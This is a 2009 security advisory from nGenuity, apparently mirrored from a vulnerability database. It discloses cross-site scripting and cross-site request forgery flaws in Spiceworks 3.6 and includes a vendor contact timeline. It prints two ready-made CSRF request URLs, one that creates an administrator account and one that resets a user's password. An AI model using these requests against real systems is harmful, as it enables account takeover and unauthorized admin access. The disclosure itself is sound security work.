[NGENUITY] - Spiceworks Multiple Vulnerabilities (XSS & CSRF)

2009-08-1000:00:00

vulners.com

JSON

nGenuity Information Services - Security Advisory

Advisory ID: NGENUITY-2009-009 - Spiceworks Multiple Vulnerabilities
(XSS & CSRF)
Application: Spiceworks 3.6.31847
Vendor: Spiceworks
Vendor website: http://www.spiceworks.com
Author: Adam Baldwin ([email protected])
Class: XSS, CSRF

I. BACKGROUND
Spiceworks is a network management, monitoring, helpdesk, etc
application that
uses a web based front end.

II. DETAILS
Multiple vulnerabilities exist within the Spiceworks platform that
can be used
to take over or otherwise abuse the application / infrastructure.

 These vulnerabilities allow for the following attack scenarios to

be executed.

 1. Creation of a new Administrator account
 2. Password reset of users

 Exploit Examples:
 Create Administrator Account:

http://example.com/settings/users/create?user%5Bfirst_name%5D=Joe&user%5Bla
st_name%5D=Nobody&user%5Bemail%5D=user%40example.com&user%5Brole%5D=admin&us
er%5Bpassword%5D=PASSWORD&user%5Bpassword_confirmation%5D=PASSWORD

 User Password Reset:

http://example.com/settings/users/change_password/1?user%5Bpassword%5D=PASSWORD
&editorId=password_entry_for_1

III. REFERENCES
[1] - http://www.spiceworks.com
[2] - http://cwe.mitre.org/data/definitions/79.html
[3] - http://cwe.mitre.org/data/definitions/352.html

IV. VENDOR COMMUNICATION
4.1.2009 - Vulnerability Discovery & Vendor Notification
4.6.2009 - Second attempt to contact vendor
4.7.2009 - Initial vendor response
8.8.2009 - Advisory Release

http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/

JSON

[NGENUITY] - Spiceworks Multiple Vulnerabilities &#40;XSS &amp; CSRF&#41;

[NGENUITY] - Spiceworks Multiple Vulnerabilities (XSS & CSRF)